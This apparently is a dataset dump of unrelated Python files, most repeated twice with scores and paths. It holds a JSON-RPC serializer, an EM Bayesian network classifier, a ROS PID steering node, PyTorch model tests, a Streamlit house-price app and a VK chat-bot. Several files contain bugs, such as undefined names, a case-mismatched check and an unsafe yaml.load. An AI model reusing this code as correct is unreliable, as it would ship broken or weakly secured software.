result = func(**request.params) if isinstance(request.params, dict) else func(*request.params)
return None if request.id is None else RPCResponse(request.id, result)
except TypeError as e:
return None if request.id is None else RPCResponse(request.id, INVALID_PARAMS_ERROR.add_data(str(e)))
except BaseException as e:
return None if request.id is None else RPCResponse(request.id, INTERNAL_ERROR.add_data(str(e)))
class RPCSerializer:
"""Methods to serialize and deserialize JSON-RPC objects"""
def __init__(self, ensure_ascii=True, length_bytes=None, order='big', separator=b''):
self.ensure_ascii, self.length_bytes, self.separator, self.order = ensure_ascii, length_bytes, separator, order
def to_bytes(self, obj):
"""Serialize JSON-RPC object to bytes"""
try:
return json.dumps(obj.to_dict(), separators=(',', ':'), ensure_ascii=self.ensure_ascii).encode()
except BaseException:
packed = json.dumps(RPCResponse(obj.id, INTERNAL_ERROR),
separators=(',', ':'), ensure_ascii=self.ensure_ascii).encode()
return b''.join((len(packed).to_bytes(self.length_bytes, self.order) if self.length_bytes else b'',
packed, self.separator))
def from_bytes(self, raw):
"""Extract JSON-RPC objects from byte string"""
res = list()
try:
data = json.loads(raw.decode())
if not isinstance(data, list):
data = (data, )
for d in data:
try:
if not isinstance(d, dict):
res.append(INVALID_REQUEST_ERROR.add_data('Not object'))
if 'jsonrpc' not in d:
res.append(INVALID_REQUEST_ERROR.add_data('No "jsonrpc" key'))
if d['jsonrpc'] != '2.0':
res.append(INVALID_REQUEST_ERROR.add_data('JSON-RPC version != 2.0'))
if 'method' in d:
res.append(RPCRequest.from_dict(d))
elif 'result' in d or 'error' in d:
res.append(RPCResponse.from_dict(d))
else:
res.append(INVALID_REQUEST_ERROR.add_data('Not request or response'))
except RPCError as e:
res.append(e)
except BaseException as e:
res.append(SERVER_ERROR)
except json.JSONDecodeError:
res.append(PARSE_ERROR.add_data('JSON error'))
except UnicodeDecodeError:
res.append(PARSE_ERROR.add_data('UTF-8 error'))
except BaseException:
res.append(SERVER_ERROR)
return res
| 0.558207 | 0.203173 |
from functools import reduce
from operator import mul
from typing import Any
import networkx as nx
import numpy as np
import pandas as pd
from sklearn.base import BaseEstimator, ClassifierMixin
from sklearn.metrics import mutual_info_score
from sklearn.metrics.cluster import contingency_matrix
from sklearn.utils.multiclass import unique_labels
from sklearn.utils.validation import check_is_fitted
from ._utils import bootstrap
from .tree import TreeBayesianNetworkClassifier
class ExpectationMaximizationTreeBayesianNetworkClassifier(
BaseClassifier, ClassifierMixin
):
def __init__(self, *, iterations: int = 100, bootstraps: int = 10):
"""Initializes this ``ExpectationMaximizationTreeBayesianNetworkClassifier``.
Args:
iterations: The maximum number of iterations of the EM algorithm to perform.
bootstraps: The exact number of each of bootstrap samples and bagging models.
"""
self.iterations = iterations
self.bootstraps = bootstraps
def fit(
self, X: pd.DataFrame, y: pd.Series
) -> "ExpectationMaximizationTreeBayesianNetworkClassifier":
"""Fits this ``ExpectationMaximizationTreeBayesianNetworkClassifier``.
Returns:
ExpectationMaximizationTreeBayesianNetworkClassifier: This object, fitted.
"""
# validate model parameters
if self.iterations <= 0:
raise ValueError(f"Iterations must be positive, but is {self.iterations}")
if self.bootstraps <= 0:
raise ValueError(f"Bootstraps must be positive, but is {self.bootstraps}")
# validate method arguments
if len(X) <= 0:
raise ValueError(f"The length of X must be positive, but is {len(X)}")
if len(X) != len(y):
raise ValueError(
f"The length of X and y must be equal, but are [{len(X)}, {len(y)}]"
)
# convenience variables
k = self.bootstraps
# initialize model
clfs = [TreeBayesianNetworkClassifier().fit(*bootstrap(X, y)) for _ in range(k)]
clfs_weights = pd.Series(np.full(k, 1 / k))
# apply Expectation-Maximization (EM) algorithm
is_converged = False
i = 0
while (i := i + 1) <= self.iterations and not is_converged:
# "expect" likelihood of each observation for each mixture component
expected = (clf.expect(X, y) for clf in clfs)
weighted = (e * w for e, w in zip(expected, clfs_weights))
df = pd.DataFrame({i_clf: sr for i_clf, sr in enumerate(weighted)})
summed_x_row = df.apply(np.sum, axis=1)
normalized_x_row = df.apply(lambda col: col / summed_x_row) # DataFrame
summed_x_col = normalized_x_row.sum()
normalized_x_col = summed_x_col / summed_x_col.sum() # Series
# "maximize" mixture ensemble weights
clfs_weights = normalized_x_col
# "maximize" each mixture component
row_weights_x_clf = (
normalized_x_row.iloc[:, i_clf] / summed_x_col.iloc[i_clf]
for i_clf in range(k)
)
clfs = [
TreeBayesianNetworkClassifier().fit(X, y, row_weights)
for row_weights in row_weights_x_clf
]
# TODO test for convergence (to be able to stop early)
self.classifiers_ = clfs
self.weights_ = clfs_weights
return self
def predict(self, X: pd.DataFrame) -> pd.Series:
check_is_fitted(self, ["classifiers_", "weights_"])
df = pd.DataFrame(
{
"preds": [clf.predict(X) for clf in self.classifiers_],
"weights": self.weights_,
}
)
return df.groupby("preds")["weights"].sum().idxmax()
|
src/hw4/expectation_maximization.py
|
from functools import reduce
from operator import mul
from typing import Any
import networkx as nx
import numpy as np
import pandas as pd
from sklearn.base import BaseEstimator, ClassifierMixin
from sklearn.metrics import mutual_info_score
from sklearn.metrics.cluster import contingency_matrix
from sklearn.utils.multiclass import unique_labels
from sklearn.utils.validation import check_is_fitted
from ._utils import bootstrap
from .tree import TreeBayesianNetworkClassifier
class ExpectationMaximizationTreeBayesianNetworkClassifier(
BaseClassifier, ClassifierMixin
):
def __init__(self, *, iterations: int = 100, bootstraps: int = 10):
"""Initializes this ``ExpectationMaximizationTreeBayesianNetworkClassifier``.
Args:
iterations: The maximum number of iterations of the EM algorithm to perform.
bootstraps: The exact number of each of bootstrap samples and bagging models.
"""
self.iterations = iterations
self.bootstraps = bootstraps
def fit(
self, X: pd.DataFrame, y: pd.Series
) -> "ExpectationMaximizationTreeBayesianNetworkClassifier":
"""Fits this ``ExpectationMaximizationTreeBayesianNetworkClassifier``.
Returns:
ExpectationMaximizationTreeBayesianNetworkClassifier: This object, fitted.
"""
# validate model parameters
if self.iterations <= 0:
raise ValueError(f"Iterations must be positive, but is {self.iterations}")
if self.bootstraps <= 0:
raise ValueError(f"Bootstraps must be positive, but is {self.bootstraps}")
# validate method arguments
if len(X) <= 0:
raise ValueError(f"The length of X must be positive, but is {len(X)}")
if len(X) != len(y):
raise ValueError(
f"The length of X and y must be equal, but are [{len(X)}, {len(y)}]"
)
# convenience variables
k = self.bootstraps
# initialize model
clfs = [TreeBayesianNetworkClassifier().fit(*bootstrap(X, y)) for _ in range(k)]
clfs_weights = pd.Series(np.full(k, 1 / k))
# apply Expectation-Maximization (EM) algorithm
is_converged = False
i = 0
while (i := i + 1) <= self.iterations and not is_converged:
# "expect" likelihood of each observation for each mixture component
expected = (clf.expect(X, y) for clf in clfs)
weighted = (e * w for e, w in zip(expected, clfs_weights))
df = pd.DataFrame({i_clf: sr for i_clf, sr in enumerate(weighted)})
summed_x_row = df.apply(np.sum, axis=1)
normalized_x_row = df.apply(lambda col: col / summed_x_row) # DataFrame
summed_x_col = normalized_x_row.sum()
normalized_x_col = summed_x_col / summed_x_col.sum() # Series
# "maximize" mixture ensemble weights
clfs_weights = normalized_x_col
# "maximize" each mixture component
row_weights_x_clf = (
normalized_x_row.iloc[:, i_clf] / summed_x_col.iloc[i_clf]
for i_clf in range(k)
)
clfs = [
TreeBayesianNetworkClassifier().fit(X, y, row_weights)
for row_weights in row_weights_x_clf
]
# TODO test for convergence (to be able to stop early)
self.classifiers_ = clfs
self.weights_ = clfs_weights
return self
def predict(self, X: pd.DataFrame) -> pd.Series:
check_is_fitted(self, ["classifiers_", "weights_"])
df = pd.DataFrame(
{
"preds": [clf.predict(X) for clf in self.classifiers_],
"weights": self.weights_,
}
)
return df.groupby("preds")["weights"].sum().idxmax()
| 0.906624 | 0.503601 |
import os, sys, argparse, errno, yaml, time, datetime
import rospy, rospkg
import numpy as np
from road_following.msg import Inference
from road_following.cfg import PID_ControlConfig
from road_following.srv import save_action, save_actionResponse
from rosky_msgs.msg import Twist2DStamped
from dynamic_reconfigure.server import Server
class Inference_To_Reaction(object):
def __init__(self):
self.package = "road_following"
self.node_name = rospy.get_name()
self.veh_name = self.node_name.split("/")[1]
rospy.loginfo("[{}] Initializing road_inference_to_reaction.py......".format(self.node_name))
self.start = rospy.wait_for_message("/" + self.veh_name +"/road_model_inference/inference", Inference)
# ros parameter
self.pid_parameter = self.read_param_from_file(package=self.package, folder="param", file_name=(self.veh_name + "_pid.yaml"))
for keys in self.pid_parameter:
self.setup_parameter("~" + keys, self.pid_parameter[keys])
# local parameter
self.initialize = True
# setup the rqt_reconfigure
self.reconfigure = Server(PID_ControlConfig, self.set_pid_parameter)
# setup the subscriber
self.sub_msg_inference = rospy.Subscriber("~inference", Inference, self.inference_analyze, queue_size=1)
# setup the publisher
self.pub_car_cmd = rospy.Publisher("~car_cmd", Twist2DStamped, queue_size=1)
# setup service
self.srv_save_pid = rospy.Service("~save_pid", save_action, self.srv_save_pid)
def getFilePath(self, package, folder, file_name):
rospack = rospkg.RosPack()
return rospack.get_path(package) + "/" + folder + "/" + file_name
def read_param_from_file(self, package, folder, file_name):
fname = self.getFilePath(package, folder, file_name)
if not os.path.isfile(fname):
if file_name == (self.veh_name + "_pid.yaml"):
rospy.loginfo("[{}] {} does not exist. Using \"default_pid.yaml\" to load parameter".format(self.node_name, fname))
fname = self.getFilePath(package, folder, file_name="default_pid.yaml")
with open(fname, 'r') as in_file:
try:
yaml_dict = yaml.load(in_file)
except yaml.YAMLError as exc:
rospy.loginfo("[{}] YAML syntax error. File: {}".format(self.node_name, fname))
return yaml_dict
def set_pid_parameter(self, config, level):
if self.initialize == True:
for keys in self.pid_parameter:
config[keys] = self.pid_parameter[keys]
self.initialize = False
else:
for keys in self.pid_parameter:
self.pid_parameter[keys] = config[keys]
if config["save_parameter"]:
self.save_pid_parameter(package=self.package, folder="param", file_name=(self.veh_name + "_pid.yaml"))
config["save_parameter"] = False
return config
def inference_analyze(self, data):
angle = data.angle
angle_last = data.angle_last
pid = angle * self.pid_parameter["steering_gain"] + (angle - angle_last) * self.pid_parameter["steering_kd"]
steering_value = pid + self.pid_parameter["steering_bias"]
car_cmd_msg = Twist2DStamped()
#car_cmd_msg.header.stamp = self.joy.header.stamp
car_cmd_msg.v = self.pid_parameter["speed_gain"]
car_cmd_msg.omega = steering_value
self.pub_car_cmd.publish(car_cmd_msg)
self.pub_msg(car_cmd_msg)
def pub_msg(self, car_cmd_msg):
self.pub_car_cmd.publish(car_cmd_msg)
def srv_save_pid(self, request):
self.save_pid_parameter(package=self.road_following, folder="param", file_name=(self.veh_name + "_pid.yaml"))
return save_actionResponse
def save_pid_parameter(self, package, folder, file_name):
fname = rospkg.RosPack().get_path(package) + "/" + folder + "/" + file_name
with open(fname, 'w') as outfile:
outfile.write(yaml.dump(self.pid_parameter, default_flow_style=False))
rospy.loginfo("[{}] Save parameter in {}.".format(self.node_name, fname))
def setup_parameter(self, param_name, default_value):
value = rospy.get_param(param_name, default_value)
# Write to parameter server for transparency
rospy.set_param(param_name, value)
rospy.loginfo("[%s] %s = %s " % (self.node_name, param_name, value))
return value
def on_shutdown(self):
rospy.loginfo("[{}] Close.".format(self.node_name))
rospy.loginfo("[{}] shutdown.".format(self.node_name))
rospy.sleep(1)
rospy.is_shutdown=True
if __name__ == "__main__" :
rospy.init_node("road_inference_to_reaction", anonymous=False)
inference_to_reaction_node = Inference_To_Reaction()
rospy.on_shutdown(inference_to_reaction_node.on_shutdown)
rospy.spin()
|
catkin_ws/src/deep_learning/road_following/src/road_inference_to_reaction.py
|
import os, sys, argparse, errno, yaml, time, datetime
import rospy, rospkg
import numpy as np
from road_following.msg import Inference
from road_following.cfg import PID_ControlConfig
from road_following.srv import save_action, save_actionResponse
from rosky_msgs.msg import Twist2DStamped
from dynamic_reconfigure.server import Server
class Inference_To_Reaction(object):
def __init__(self):
self.package = "road_following"
self.node_name = rospy.get_name()
self.veh_name = self.node_name.split("/")[1]
rospy.loginfo("[{}] Initializing road_inference_to_reaction.py......".format(self.node_name))
self.start = rospy.wait_for_message("/" + self.veh_name +"/road_model_inference/inference", Inference)
# ros parameter
self.pid_parameter = self.read_param_from_file(package=self.package, folder="param", file_name=(self.veh_name + "_pid.yaml"))
for keys in self.pid_parameter:
self.setup_parameter("~" + keys, self.pid_parameter[keys])
# local parameter
self.initialize = True
# setup the rqt_reconfigure
self.reconfigure = Server(PID_ControlConfig, self.set_pid_parameter)
# setup the subscriber
self.sub_msg_inference = rospy.Subscriber("~inference", Inference, self.inference_analyze, queue_size=1)
# setup the publisher
self.pub_car_cmd = rospy.Publisher("~car_cmd", Twist2DStamped, queue_size=1)
# setup service
self.srv_save_pid = rospy.Service("~save_pid", save_action, self.srv_save_pid)
def getFilePath(self, package, folder, file_name):
rospack = rospkg.RosPack()
return rospack.get_path(package) + "/" + folder + "/" + file_name
def read_param_from_file(self, package, folder, file_name):
fname = self.getFilePath(package, folder, file_name)
if not os.path.isfile(fname):
if file_name == (self.veh_name + "_pid.yaml"):
rospy.loginfo("[{}] {} does not exist. Using \"default_pid.yaml\" to load parameter".format(self.node_name, fname))
fname = self.getFilePath(package, folder, file_name="default_pid.yaml")
with open(fname, 'r') as in_file:
try:
yaml_dict = yaml.load(in_file)
except yaml.YAMLError as exc:
rospy.loginfo("[{}] YAML syntax error. File: {}".format(self.node_name, fname))
return yaml_dict
def set_pid_parameter(self, config, level):
if self.initialize == True:
for keys in self.pid_parameter:
config[keys] = self.pid_parameter[keys]
self.initialize = False
else:
for keys in self.pid_parameter:
self.pid_parameter[keys] = config[keys]
if config["save_parameter"]:
self.save_pid_parameter(package=self.package, folder="param", file_name=(self.veh_name + "_pid.yaml"))
config["save_parameter"] = False
return config
def inference_analyze(self, data):
angle = data.angle
angle_last = data.angle_last
pid = angle * self.pid_parameter["steering_gain"] + (angle - angle_last) * self.pid_parameter["steering_kd"]
steering_value = pid + self.pid_parameter["steering_bias"]
car_cmd_msg = Twist2DStamped()
#car_cmd_msg.header.stamp = self.joy.header.stamp
car_cmd_msg.v = self.pid_parameter["speed_gain"]
car_cmd_msg.omega = steering_value
self.pub_car_cmd.publish(car_cmd_msg)
self.pub_msg(car_cmd_msg)
def pub_msg(self, car_cmd_msg):
self.pub_car_cmd.publish(car_cmd_msg)
def srv_save_pid(self, request):
self.save_pid_parameter(package=self.road_following, folder="param", file_name=(self.veh_name + "_pid.yaml"))
return save_actionResponse
def save_pid_parameter(self, package, folder, file_name):
fname = rospkg.RosPack().get_path(package) + "/" + folder + "/" + file_name
with open(fname, 'w') as outfile:
outfile.write(yaml.dump(self.pid_parameter, default_flow_style=False))
rospy.loginfo("[{}] Save parameter in {}.".format(self.node_name, fname))
def setup_parameter(self, param_name, default_value):
value = rospy.get_param(param_name, default_value)
# Write to parameter server for transparency
rospy.set_param(param_name, value)
rospy.loginfo("[%s] %s = %s " % (self.node_name, param_name, value))
return value
def on_shutdown(self):
rospy.loginfo("[{}] Close.".format(self.node_name))
rospy.loginfo("[{}] shutdown.".format(self.node_name))
rospy.sleep(1)
rospy.is_shutdown=True
if __name__ == "__main__" :
rospy.init_node("road_inference_to_reaction", anonymous=False)
inference_to_reaction_node = Inference_To_Reaction()
rospy.on_shutdown(inference_to_reaction_node.on_shutdown)
rospy.spin()
| 0.36886 | 0.095476 |
import unittest
class TestCantor(unittest.TestCase):
def test_cantor_initiator(self):
import torch
from torch.autograd import Variable
import neurofire.models.cantor.cantor as cantor
# Build model
initiator = cantor.CantorInitiator(3, base_width=30)
# Build dummy input
input_shape = [1, 3, 128, 128]
input = Variable(torch.rand(*input_shape))
# Get output
# noinspection PyCallingNonCallable
output = initiator(input)
# Validate
self.assertEqual(len(output), 7)
self.assertEqual(list(output[0].size()), [1, 120, 16, 16])
self.assertEqual(list(output[1].size()), [1, 120, 32, 32])
self.assertEqual(list(output[2].size()), [1, 90, 32, 32])
self.assertEqual(list(output[3].size()), [1, 90, 64, 64])
self.assertEqual(list(output[4].size()), [1, 60, 64, 64])
self.assertEqual(list(output[5].size()), [1, 60, 128, 128])
self.assertEqual(list(output[6].size()), [1, 30, 128, 128])
# noinspection PyCallingNonCallable
def test_cantor_module(self):
import torch
from torch.autograd import Variable
import neurofire.models.cantor.cantor as cantor
from inferno.extensions.containers.sequential import Sequential2
# Build model
initiator = cantor.CantorInitiator(3, base_width=30)
module = cantor.CantorModule(base_width=30)
model = Sequential2(initiator, module)
# Build dummy input
input_shape = [1, 3, 128, 128]
input = Variable(torch.rand(*input_shape))
output = model(input)
# Validate
self.assertEqual(len(output), 7)
self.assertEqual(list(output[0].size()), [1, 120, 16, 16])
self.assertEqual(list(output[1].size()), [1, 120, 32, 32])
self.assertEqual(list(output[2].size()), [1, 90, 32, 32])
self.assertEqual(list(output[3].size()), [1, 90, 64, 64])
self.assertEqual(list(output[4].size()), [1, 60, 64, 64])
self.assertEqual(list(output[5].size()), [1, 60, 128, 128])
self.assertEqual(list(output[6].size()), [1, 30, 128, 128])
# noinspection PyCallingNonCallable
def test_cantor_terminator(self):
import torch
from torch.autograd import Variable
import neurofire.models.cantor.cantor as cantor
from inferno.extensions.containers.sequential import Sequential2
# Build model
initiator = cantor.CantorInitiator(3, base_width=30)
terminator = cantor.CantorTerminator(1, base_width=30, activation='Sigmoid')
model = Sequential2(initiator, terminator)
# Build dummy input
input_shape = [1, 3, 128, 128]
input = Variable(torch.rand(*input_shape))
output = model(input)
# Validate
self.assertEqual(list(output.size()), [1, 1, 128, 128])
def test_cantor(self):
import torch
from torch.autograd import Variable
import neurofire.models.cantor.cantor as cantor
input_shape = [1, 1, 3, 128, 128]
model = cantor.Cantor.from_shape(input_shape=input_shape,
base_width=30,
num_modules=3,
output_activation='Sigmoid')
input = Variable(torch.rand(*input_shape))
output = model(input)
self.assertEqual(list(output.size()), input_shape)
if __name__ == '__main__':
unittest.main()
|
tests/neurofire/models/test_cantor.py
|
import unittest
class TestCantor(unittest.TestCase):
def test_cantor_initiator(self):
import torch
from torch.autograd import Variable
import neurofire.models.cantor.cantor as cantor
# Build model
initiator = cantor.CantorInitiator(3, base_width=30)
# Build dummy input
input_shape = [1, 3, 128, 128]
input = Variable(torch.rand(*input_shape))
# Get output
# noinspection PyCallingNonCallable
output = initiator(input)
# Validate
self.assertEqual(len(output), 7)
self.assertEqual(list(output[0].size()), [1, 120, 16, 16])
self.assertEqual(list(output[1].size()), [1, 120, 32, 32])
self.assertEqual(list(output[2].size()), [1, 90, 32, 32])
self.assertEqual(list(output[3].size()), [1, 90, 64, 64])
self.assertEqual(list(output[4].size()), [1, 60, 64, 64])
self.assertEqual(list(output[5].size()), [1, 60, 128, 128])
self.assertEqual(list(output[6].size()), [1, 30, 128, 128])
# noinspection PyCallingNonCallable
def test_cantor_module(self):
import torch
from torch.autograd import Variable
import neurofire.models.cantor.cantor as cantor
from inferno.extensions.containers.sequential import Sequential2
# Build model
initiator = cantor.CantorInitiator(3, base_width=30)
module = cantor.CantorModule(base_width=30)
model = Sequential2(initiator, module)
# Build dummy input
input_shape = [1, 3, 128, 128]
input = Variable(torch.rand(*input_shape))
output = model(input)
# Validate
self.assertEqual(len(output), 7)
self.assertEqual(list(output[0].size()), [1, 120, 16, 16])
self.assertEqual(list(output[1].size()), [1, 120, 32, 32])
self.assertEqual(list(output[2].size()), [1, 90, 32, 32])
self.assertEqual(list(output[3].size()), [1, 90, 64, 64])
self.assertEqual(list(output[4].size()), [1, 60, 64, 64])
self.assertEqual(list(output[5].size()), [1, 60, 128, 128])
self.assertEqual(list(output[6].size()), [1, 30, 128, 128])
# noinspection PyCallingNonCallable
def test_cantor_terminator(self):
import torch
from torch.autograd import Variable
import neurofire.models.cantor.cantor as cantor
from inferno.extensions.containers.sequential import Sequential2
# Build model
initiator = cantor.CantorInitiator(3, base_width=30)
terminator = cantor.CantorTerminator(1, base_width=30, activation='Sigmoid')
model = Sequential2(initiator, terminator)
# Build dummy input
input_shape = [1, 3, 128, 128]
input = Variable(torch.rand(*input_shape))
output = model(input)
# Validate
self.assertEqual(list(output.size()), [1, 1, 128, 128])
def test_cantor(self):
import torch
from torch.autograd import Variable
import neurofire.models.cantor.cantor as cantor
input_shape = [1, 1, 3, 128, 128]
model = cantor.Cantor.from_shape(input_shape=input_shape,
base_width=30,
num_modules=3,
output_activation='Sigmoid')
input = Variable(torch.rand(*input_shape))
output = model(input)
self.assertEqual(list(output.size()), input_shape)
if __name__ == '__main__':
unittest.main()
| 0.667581 | 0.605099 |
import streamlit as st
import math
import numpy as np
from flask import Flask, request, jsonify, render_template
from model import Model
app = Flask(__name__)
@app.route('/')
def home():
return render_template('login.html')
@app.route('/realapp')
def realapp():
"""
Returns
-------
Run App
"""
#load Module class
# Create a text element and let the reader know the data is loading.
with st.spinner(text='In progress'):
#data_load_state = st.text('Loading data & model...')
# Notify the reader that the data was successfully loaded.
__model = Model()
st.success('Model Ready')
#Dataset & zones
df = __model.dataset_preprocessed
#Parking Space Price
parking_price_df =(
df.loc[df['parkingSpacePrice']>1000].
groupby('district').mean()['parkingSpacePrice'])
#Title & Header Image
st.title('Evaluate your home in Telangana')
st.subheader("Discover the market value of your home convenient and easy with one click")
st.image('./data/Header Varese.jpg',use_column_width=True)
st.subheader ("We use a Machine Learning algorithm on %s properties"
% len(df))
#Parameters
st.subheader("Set the property parameters")
#City
city = st.selectbox('City',['Warangal','Suryapet'],index = 0)
selector_city = 'wG - '
if city == 'warangal':
selector_city = 'WG - '
else:
selector_city = 'SU - '
#Zone
zonesList = (
df.loc[df['district'].str.startswith (selector_city)]['district'].unique().tolist()
)
#Replace prefix
zonesList = [i.replace(selector_city,'') for i in zonesList]
district = st.selectbox('Zone', zonesList, index = 0)
#Property Type List
propertyTypelist = __model.propertyTypeList
propertyType = st.selectbox('Kind', propertyTypelist, index = 0)
#Conversiont to model variables
propertyType = __model.propertyTypeConverter(propertyType)
#Rest of parameters
size = st.number_input('Square meters',
min_value=10,
max_value=5000,
value = 100
)
rooms = st.slider('Locals',
min_value = 1,
max_value = 10,
value = 3)
#Conversiont to model variables
#roomsCat = __model.roomsCategory(rooms)
if rooms >= 4:
roomsCat = 4
else:
roomsCat = rooms
#Bathrooms
bathrooms = st.slider('Bathrooms',
min_value = 1,
max_value = 10,
value = 2
)
#Conversiont to model variables
if bathrooms >= 2:
bathroomsCat = 2
else:
bathroomsCat = bathrooms
#Status italiano
status_it = __model.statusList
status = st.radio('State',status_it, index = 1)
#Conversiont to model variables
statusOutput = 'good'
if status == "To be restructured":
statusOutput = 'renew'
elif status == "Good":
statusOutput = 'good'
elif status == "New Construction ":
statusOutput = 'newdevelopment'
#Extra Feautures
#parkingBox = st.checkbox('Posto Auto - Box', value = 0)
#garden = st.checkbox('Giardino- Terrazzo', value = 0)
#swimming_pool = st.checkbox('Piscina', value = 0)
#Parking Space District Selected
try:
parking_space = int(
parking_price_df.loc[parking_price_df.index==
(selector_city+district)].values[0])
except:
parking_space = 0
#Button to value
button = st.button('Predit Cost')
if button:
value_model = __model.predict(
size,
propertyType,
(selector_city+district),
statusOutput,
roomsCat,
bathroomsCat,
)
value = int(math.ceil((value_model ) / 5000.0) * 5000.0)
st.write("Market value")
st.write("₹{:,.0f}".format(value))
if parking_space > 0:
st.write("Average price %s - %s " % (city,district))
st.write("₹{:,.0f}".format(parking_space))
if __name__ == "__main__":
app.run(host="0.0.0.0",port=6442)
#app_run()
|
app.py
|
import streamlit as st
import math
import numpy as np
from flask import Flask, request, jsonify, render_template
from model import Model
app = Flask(__name__)
@app.route('/')
def home():
return render_template('login.html')
@app.route('/realapp')
def realapp():
"""
Returns
-------
Run App
"""
#load Module class
# Create a text element and let the reader know the data is loading.
with st.spinner(text='In progress'):
#data_load_state = st.text('Loading data & model...')
# Notify the reader that the data was successfully loaded.
__model = Model()
st.success('Model Ready')
#Dataset & zones
df = __model.dataset_preprocessed
#Parking Space Price
parking_price_df =(
df.loc[df['parkingSpacePrice']>1000].
groupby('district').mean()['parkingSpacePrice'])
#Title & Header Image
st.title('Evaluate your home in Telangana')
st.subheader("Discover the market value of your home convenient and easy with one click")
st.image('./data/Header Varese.jpg',use_column_width=True)
st.subheader ("We use a Machine Learning algorithm on %s properties"
% len(df))
#Parameters
st.subheader("Set the property parameters")
#City
city = st.selectbox('City',['Warangal','Suryapet'],index = 0)
selector_city = 'wG - '
if city == 'warangal':
selector_city = 'WG - '
else:
selector_city = 'SU - '
#Zone
zonesList = (
df.loc[df['district'].str.startswith (selector_city)]['district'].unique().tolist()
)
#Replace prefix
zonesList = [i.replace(selector_city,'') for i in zonesList]
district = st.selectbox('Zone', zonesList, index = 0)
#Property Type List
propertyTypelist = __model.propertyTypeList
propertyType = st.selectbox('Kind', propertyTypelist, index = 0)
#Conversiont to model variables
propertyType = __model.propertyTypeConverter(propertyType)
#Rest of parameters
size = st.number_input('Square meters',
min_value=10,
max_value=5000,
value = 100
)
rooms = st.slider('Locals',
min_value = 1,
max_value = 10,
value = 3)
#Conversiont to model variables
#roomsCat = __model.roomsCategory(rooms)
if rooms >= 4:
roomsCat = 4
else:
roomsCat = rooms
#Bathrooms
bathrooms = st.slider('Bathrooms',
min_value = 1,
max_value = 10,
value = 2
)
#Conversiont to model variables
if bathrooms >= 2:
bathroomsCat = 2
else:
bathroomsCat = bathrooms
#Status italiano
status_it = __model.statusList
status = st.radio('State',status_it, index = 1)
#Conversiont to model variables
statusOutput = 'good'
if status == "To be restructured":
statusOutput = 'renew'
elif status == "Good":
statusOutput = 'good'
elif status == "New Construction ":
statusOutput = 'newdevelopment'
#Extra Feautures
#parkingBox = st.checkbox('Posto Auto - Box', value = 0)
#garden = st.checkbox('Giardino- Terrazzo', value = 0)
#swimming_pool = st.checkbox('Piscina', value = 0)
#Parking Space District Selected
try:
parking_space = int(
parking_price_df.loc[parking_price_df.index==
(selector_city+district)].values[0])
except:
parking_space = 0
#Button to value
button = st.button('Predit Cost')
if button:
value_model = __model.predict(
size,
propertyType,
(selector_city+district),
statusOutput,
roomsCat,
bathroomsCat,
)
value = int(math.ceil((value_model ) / 5000.0) * 5000.0)
st.write("Market value")
st.write("₹{:,.0f}".format(value))
if parking_space > 0:
st.write("Average price %s - %s " % (city,district))
st.write("₹{:,.0f}".format(parking_space))
if __name__ == "__main__":
app.run(host="0.0.0.0",port=6442)
#app_run()
| 0.385375 | 0.258097 |
import requests
from typing import Callable, Union, Optional
from .objects import SendableMessage
def get_session_requests():
session = requests.Session()
session.headers['Accept'] = 'application/json'
session.headers['Content-Type'] = 'application/x-www-form-urlencoded'
return session
class VKChatBot:
def __init__(self, access_token, group_id, api_url='https://api.vk.com/method/', v='5.80',
command_prefix='!'):
self.access_token = access_token
self.group_id = group_id
self.api_url = api_url
self.api_version = v
self._session = get_session_requests()
self._prefix = command_prefix
self._commands = {}
self.unknown_command_msg = 'Unknown command. Type %shelp to see list of commnands' % command_prefix
def unknown_command_handler(self, event) -> Optional[Union[str, SendableMessage]]:
return self.unknown_command_msg
def _poll_events(self):
poll = self._session.get(url=f'{self.api_url}groups.getLongPollServer', params={
'group_id': self.group_id,
'access_token': self.access_token,
'v': self.api_version
}).json()['response']
server, key, ts = poll['server'], poll['key'], poll['ts']
while True:
long_poll = self._session.post(server, data={
'act': 'a_check',
'key': key,
'ts': ts,
'wait': 25,
}).json()
for update in long_poll['updates']:
yield update
ts = long_poll['ts']
def register_command(self, command: str, handler: Callable):
self._commands[command] = handler
def unregister_command(self, command: str):
del self._commands[command]
def _process_command(self, event):
text = event['object']['text']
if not text.startswith(self._prefix):
return
cmd = text.lower().split()[0][len(self._prefix):]
handler = self._commands.get(cmd, self.unknown_command_handler)
return handler(event)
def send_message(self, peer_id, message: Union[str, SendableMessage]):
if isinstance(message, str):
params = {'message': message}
else:
params = message.to_dict()
self._session.post(f'{self.api_url}messages.send', data={
'peer_id': peer_id,
'access_token': self.access_token,
'v': self.api_version,
**params,
})
def work(self):
for event in self._poll_events():
if event['type'] == 'message_new':
result = self._process_command(event)
if result is not None:
peer_id = event['object']['peer_id']
self.send_message(peer_id, result)
__all__ = ['VKChatBot', 'objects']
|
vkchatbot/__init__.py
|
import requests
from typing import Callable, Union, Optional
from .objects import SendableMessage
def get_session_requests():
session = requests.Session()
session.headers['Accept'] = 'application/json'
session.headers['Content-Type'] = 'application/x-www-form-urlencoded'
return session
class VKChatBot:
def __init__(self, access_token, group_id, api_url='https://api.vk.com/method/', v='5.80',
command_prefix='!'):
self.access_token = access_token
self.group_id = group_id
self.api_url = api_url
self.api_version = v
self._session = get_session_requests()
self._prefix = command_prefix
self._commands = {}
self.unknown_command_msg = 'Unknown command. Type %shelp to see list of commnands' % command_prefix
def unknown_command_handler(self, event) -> Optional[Union[str, SendableMessage]]:
return self.unknown_command_msg
def _poll_events(self):
poll = self._session.get(url=f'{self.api_url}groups.getLongPollServer', params={
'group_id': self.group_id,
'access_token': self.access_token,
'v': self.api_version
}).json()['response']
server, key, ts = poll['server'], poll['key'], poll['ts']
while True:
long_poll = self._session.post(server, data={
'act': 'a_check',
'key': key,
'ts': ts,
'wait': 25,
}).json()
for update in long_poll['updates']:
yield update
ts = long_poll['ts']
def register_command(self, command: str, handler: Callable):
self._commands[command] = handler
def unregister_command(self, command: str):
del self._commands[command]
def _process_command(self, event):
text = event['object']['text']
if not text.startswith(self._prefix):
return
cmd = text.lower().split()[0][len(self._prefix):]
handler = self._commands.get(cmd, self.unknown_command_handler)
return handler(event)
def send_message(self, peer_id, message: Union[str, SendableMessage]):
if isinstance(message, str):
params = {'message': message}
else:
params = message.to_dict()
self._session.post(f'{self.api_url}messages.send', data={
'peer_id': peer_id,
'access_token': self.access_token,
'v': self.api_version,
**params,
})
def work(self):
for event in self._poll_events():
if event['type'] == 'message_new':
result = self._process_command(event)
if result is not None:
peer_id = event['object']['peer_id']
self.send_message(peer_id, result)
